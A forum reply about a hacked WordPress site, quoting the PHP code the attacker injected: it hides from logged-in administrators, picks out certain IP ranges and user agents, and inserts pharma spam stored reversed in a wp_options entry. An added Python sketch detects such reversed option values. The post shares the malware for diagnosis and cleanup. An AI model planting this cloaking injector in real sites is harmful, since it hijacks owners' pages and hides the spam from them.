Reply To: Weird pharma hack

#787
Grady Booch
Member

Thanks, Eli!

BTW, my second site was hacked in a similar albeit subtly different way. In this case, the offending wp_options name/value pair is stored in a different place (it’s named _property1), and the generated code that’s injected just after a page’s body is this:


if (!function_exists("b_call")) {
    // Start output buffering so b_goes() can rewrite the finished page
    function b_call() {
        if (!ob_get_level()) ob_start("b_goes");
    }
    function b_goes($p) {
        if (!defined('wp_m1')) {
            // Field 1: "start,span" IP ranges; fields 2 and 3: User-Agent substrings
            $f1 = explode('|', '3639549952,8191.1123631104,8191.1089052672,8191.1078218752,2047.1078220802,1229.1087381508,1444.3512041472,4095.1113980928,4095.1208926208,16383.1249705984,65535|via translate.google.com,Google WAP Proxy,Google CHTML Proxy|tumblrbot');
            $f3=0;
            $f2=ip2long($_SERVER["REMOTE_ADDR"]);
            foreach(explode('.', array_shift($f1)) as $line) {
                list($a1,$a2)=explode(',',$line);
                if ($f2>=$a1&&$f2<=($a1+$a2)) {
                    $f3=1;
                    break;
                }
            }
            foreach(array_reverse($f1,1) as $k=>$v) {
                foreach(explode(',', $v) as $line) {
                    if (stripos($_SERVER["HTTP_USER_AGENT"], $line) !== false) {
                        $f3=$k;
                        break;
                    }
                }
            }
            // Return the page untouched for unmatched visitors and for anyone with WordPress login cookies
            if (!$f3 || isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_property1'))) {
                return $p;
            }
            // The option value is a serialized two-item array stored reversed
            list($m, $n) = @unserialize(trim(strrev($m)));
            define('wp_m1', $m);
            define('wp_n1', $n);
        }
        // Inject the two stored strings after <body> and before </head>, falling back to the first </div>
        if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
        if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
        return $p;
    }
    function b_end() {
        @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    add_action("init", "b_call");
    add_action("wp_head", "b_call");
    add_action("get_sidebar", "b_call");
    add_action("wp_footer", "b_call");
    add_action("shutdown", "b_end");
}

but it has the same effect (the value of the spam was the same for both sites, although the code was different, as above, and the name of the wp_option item was different).
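
Added example, not part of the original post: because the option name changes from site to site, this Python sketch flags any exported wp_options row whose value, once byte-reversed and trimmed as in the `unserialize(trim(strrev($m)))` call above, parses as a PHP-serialized array of strings. The function names, the (option_name, option_value) row format and the sample rows are assumptions constructed for illustration.

```python
import re

# Matches the header of a PHP-serialized string element: s:<byte length>:"
_STR = re.compile(rb's:(\d+):"')

def parse_string_array(blob: bytes):
    """Parse a:N:{i:0;s:L:"...";...} holding only strings; return list or None.
    Reads the format by hand, so nothing from the dump is ever unserialized."""
    m = re.match(rb'a:(\d+):\{', blob)
    if not m or not blob.endswith(b'}'):
        return None
    pos, items = m.end(), []
    for idx in range(int(m.group(1))):
        key = b'i:%d;' % idx
        if not blob.startswith(key, pos):
            return None
        pos += len(key)
        s = _STR.match(blob, pos)
        if not s:
            return None
        start = s.end()
        end = start + int(s.group(1))      # PHP string lengths count bytes
        if blob[end:end + 2] != b'";':
            return None
        items.append(blob[start:end].decode('utf-8', 'replace'))
        pos = end + 2
    return items if pos == len(blob) - 1 else None

def find_reversed_payloads(rows):
    """rows: iterable of (option_name, option_value). Return {name: [strings]}."""
    hits = {}
    for name, value in rows:
        # Mirror trim(strrev($value)): reverse the bytes, then strip whitespace
        candidate = value.encode('utf-8')[::-1].strip()
        items = parse_string_array(candidate)
        if items is not None:
            hits[name] = items
    return hits

# Constructed sample rows; the markers stand in for the injected strings
SAMPLE_ROWS = [
    ("siteurl", "https://example.test"),
    ("active_plugins", 'a:1:{i:0;s:9:"hello.php";}'),   # normal, stored forwards
    ("_property1",
     '  a:2:{i:0;s:11:"HEAD-MARKER";i:1;s:11:"BODY-MARKER";}'[::-1]),
]

if __name__ == "__main__":
    for name, strings in find_reversed_payloads(SAMPLE_ROWS).items():
        print(name, strings)
```

WordPress stores serialized option values forwards, so a value that only parses after reversal is worth inspecting whatever its name.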